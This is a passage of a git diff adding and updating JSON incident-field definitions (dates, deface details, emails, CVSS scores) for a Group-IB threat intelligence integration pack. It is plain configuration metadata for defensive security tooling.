b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_First_Seen.json @@ -0,0 +1,62 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Malware", + "GIB Malware CNC", + "GIB Cybercriminal Threat", + "GIB Attacks Phishing Group", + "GIB Suspicious IP Socks Proxy", + "GIB Cybercriminal Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat" + ], + "caseInsensitive": true, + "cliName": "gibdatefirstseen", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibdatefirstseen", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Date First Seen", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Malware", + "GIB Malware CNC", + "GIB Cybercriminal Threat", + "GIB Attacks Phishing Group", + "GIB Suspicious IP Socks Proxy", + "GIB Cybercriminal Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Incident.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Incident.json new file mode 100644 index 000000000000..b0d3f3bb723b --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Incident.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Mule" + ], + "caseInsensitive": true, + "cliName": "gibdateincident", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibdateincident", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Date Incident", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Mule" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Last_Compromised.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Last_Compromised.json new file mode 100644 index 000000000000..33812076f495 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Last_Compromised.json @@ -0,0 +1,36 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Account Group", + "GIB Compromised Card Group" + ], + "caseInsensitive": true, + "cliName": "gibdatelastcompromised", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibdatelastcompromised", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Date Last Compromised", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Account Group", + "GIB Compromised Card Group" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Last_Seen.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Last_Seen.json new file mode 100644 index 000000000000..794463dbcbbd --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Last_Seen.json @@ -0,0 +1,62 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB OSI Vulnerability", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Malware CNC", + "GIB Cybercriminal Threat", + "GIB Attacks Phishing Group", + "GIB Suspicious IP Socks Proxy", + "GIB Cybercriminal Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat" + ], + "caseInsensitive": true, + "cliName": "gibdatelastseen", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibdatelastseen", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Date Last Seen", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB OSI Vulnerability", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Malware CNC", + "GIB Cybercriminal Threat", + "GIB Attacks Phishing Group", + "GIB Suspicious IP Socks Proxy", + "GIB Cybercriminal Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Modified.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Modified.json new file mode 100644 index 000000000000..6caa9b6739b3 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Modified.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibdatemodified", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibdatemodified", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Date Modified", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Published.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Published.json new file mode 100644 index 000000000000..473776340603 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Published.json @@ -0,0 +1,36 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability", + "GIB Nation-State Cybercriminals Threat" + ], + "caseInsensitive": true, + "cliName": "gibdatepublished", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibdatepublished", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Date Published", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability", + "GIB Nation-State Cybercriminals Threat" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Updated_At.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Updated_At.json new file mode 100644 index 000000000000..7280813d46b5 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Updated_At.json @@ -0,0 +1,40 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Malware", + "GIB Cybercriminal Threat Actor", + "GIB APT Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor" + ], + "caseInsensitive": true, + "cliName": "gibdateupdatedat", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibdateupdatedat", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Date Updated At", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Malware", + "GIB Cybercriminal Threat Actor", + "GIB APT Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_of_Detection.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_of_Detection.json index af37ae5c4b7b..39750b0e5407 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_of_Detection.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_of_Detection.json @@ -6,7 +6,12 @@ "GIB Brand Protection Phishing Kit", "GIB OSI Git Leak", "GIB Compromised Card", - "GIB Compromised Account" + "GIB Compromised Account", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP Open Proxy", + "GIB Malware CNC", + "GIB Attacks Phishing Group", + "GIB Suspicious IP Socks Proxy" ], "caseInsensitive": true, "cliName": "gibdateofdetection", @@ -30,5 +35,20 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Targeted Malware", + "GIB Brand Protection Phishing", + "GIB Brand Protection Phishing Kit", + "GIB OSI Git Leak", + "GIB Compromised Card", + "GIB Compromised Account", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP Open Proxy", + "GIB Malware CNC", + "GIB Attacks Phishing Group", + "GIB Suspicious IP Socks Proxy" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Contacts.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Contacts.json new file mode 100644 index 000000000000..dd8fd8a5a546 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Contacts.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Deface" + ], + "caseInsensitive": true, + "cliName": "gibdefacecontacts", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibdefacecontacts", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Deface Contacts", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Deface" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Date.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Date.json new file mode 100644 index 000000000000..54ea992db980 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Date.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Deface" + ], + "caseInsensitive": true, + "cliName": "gibdefacedate", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibdefacedate", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Deface Date", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Deface" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Site_URL.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Site_URL.json new file mode 100644 index 000000000000..b316ef344677 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Site_URL.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Deface" + ], + "caseInsensitive": true, + "cliName": "gibdefacesiteurl", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibdefacesiteurl", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Deface Site URL", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Deface" + ], + "threshold": 72, + "type": "url", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Source.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Source.json new file mode 100644 index 000000000000..9d2b849d791b --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Source.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Deface" + ], + "caseInsensitive": true, + "cliName": "gibdefacesource", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibdefacesource", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Deface Source", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Deface" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Downloaded_From.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Downloaded_From.json index d1004897517a..a6c74f57b608 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Downloaded_From.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Downloaded_From.json @@ -1,7 +1,8 @@ { "associatedToAll": false, "associatedTypes": [ - "GIB Brand Protection Phishing Kit" + "GIB Brand Protection Phishing Kit", + "GIB Attacks Phishing Group" ], "caseInsensitive": true, "cliName": "gibdownloadedfrom", @@ -22,8 +23,14 @@ "threshold": 72, "type": "markdown", "unmapped": false, - "unsearchable": false, + "unsearchable": true, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Phishing Kit", + "GIB Attacks Phishing Group" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Downloaded_From_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Downloaded_From_Table.json new file mode 100644 index 000000000000..f9d3e39711dc --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Downloaded_From_Table.json @@ -0,0 +1,106 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Phishing Kit" + ], + "caseInsensitive": true, + "cliName": "gibdownloadedfromtable", + "closeForm": true, + "columns": [ + { + "displayName": "Date", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "date", + "orgType": "date", + "required": false, + "script": "", + "selectValues": null, + "type": "date", + "width": 150 + }, + { + "displayName": "URL", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "url", + "orgType": "url", + "required": false, + "script": "", + "selectValues": null, + "type": "url", + "width": 150 + }, + { + "displayName": "Phishing URL", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "phishingurl", + "orgType": "url", + "required": false, + "script": "", + "selectValues": null, + "type": "url", + "width": 150 + }, + { + "displayName": "Domain", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "domain", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "File Name", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "filename", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + } + ], + "content": true, + "defaultRows": [ + {} + ], + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibdownloadedfromtable", + "isReadOnly": false, + "locked": false, + "name": "GIB Downloaded From Table", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Phishing Kit" + ], + "threshold": 72, + "type": "grid", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Drop_Email.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Drop_Email.json index f3b5a312fcf9..82e16c48d85a 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Drop_Email.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Drop_Email.json @@ -25,5 +25,10 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Compromised Account" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Drop_Email_Domain.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Drop_Email_Domain.json index 1cf17e470ffd..d773fea48b0e 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Drop_Email_Domain.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Drop_Email_Domain.json @@ -25,5 +25,10 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Compromised Account" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Email.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Email.json index 98399174290d..d21997322a08 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Email.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Email.json @@ -28,5 +28,13 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Data Breach", + "GIB Compromised Account", + "GIB Compromised Card", + "GIB Brand Protection Domain" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Email_Domains.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Email_Domains.json new file mode 100644 index 000000000000..e9710624181b --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Email_Domains.json @@ -0,0 +1,33 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Data Breach" + ], + "caseInsensitive": true, + "cliName": "gibemaildomains", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibemaildomains", + "isReadOnly": false, + "locked": false, + "name": "GIB Email Domains", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Data Breach" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Emails.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Emails.json new file mode 100644 index 000000000000..194817cf07c5 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Emails.json @@ -0,0 +1,33 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Data Breach" + ], + "caseInsensitive": true, + "cliName": "gibemails", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibemails", + "isReadOnly": false, + "locked": false, + "name": "GIB Emails", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Data Breach" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Base.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Base.json new file mode 100644 index 000000000000..00fe6f0be464 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Base.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibextendedcvssbase", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibextendedcvssbase", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Extended CVSS Base", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "number", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Exploitability.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Exploitability.json new file mode 100644 index 000000000000..322a0191ede9 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Exploitability.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibextendedcvssexploitability", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibextendedcvssexploitability", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Extended CVSS Exploitability", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "number", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Impact.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Impact.json new file mode 100644 index 000000000000..8b825a90bd39 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Impact.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibextendedcvssimpact", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibextendedcvssimpact", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Extended CVSS Impact", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "number", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Overall.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Overall.json new file mode 100644 index 000000000000..4f57975cf716 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Overall.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibextendedcvssoverall", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibextendedcvssoverall", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Extended CVSS Overall", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "number", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Temporal.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Temporal.json new file mode 100644 index 000000000000..40bcd7106fdb --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Temporal.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibextendedcvsstemporal", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibextendedcvsstemporal", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Extended CVSS Temporal", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "number", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_Description.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_Description.json new file mode 100644 index 000000000000..21b8af27d2c9 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_Description.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibextendeddescription", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibextendeddescription", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Extended Description", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + 